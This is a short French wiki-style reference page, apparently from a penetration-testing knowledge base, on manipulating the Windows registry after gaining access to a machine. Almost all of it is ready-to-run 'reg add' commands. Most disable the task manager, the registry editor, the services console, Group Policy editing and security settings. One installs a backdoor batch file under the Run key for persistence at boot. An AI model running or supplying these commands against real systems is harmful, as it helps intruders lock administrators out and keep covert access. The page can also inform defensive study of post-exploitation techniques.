Registre
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Post-exploitation Windows |
| Cible | Base de registre (reg add)
|
| Usages | Restrictions, persistance au boot |
| Voir aussi | UAC · Powershell execution metasploit |
Manipulation de la base de registre Windows via reg add, une fois un accès obtenu : restreindre ou réactiver des fonctions (services.msc, gestionnaire des tâches, éditeur de registre…) et installer une persistance au démarrage.
Restreindre / réactiver des fonctions
Console de services (services.msc) — désactiver (1) / activer (0) :
REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 1 /f
Options Internet :
REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 1 /f
Options des dossiers :
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
Onglet Sécurité :
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 1 /f
Éditeur de stratégie de groupe :
REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f
Gestionnaire des tâches :
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Éditeur de registre :
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Dans tous les cas, remplacer /d 1 par /d 0 pour réactiver la fonction.
Persistance au démarrage
REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdr /d c:\files\backdoor.bat
Voir aussi
- UAC — contrôle de compte utilisateur
- Powershell execution metasploit — exécution PowerShell en post-exploitation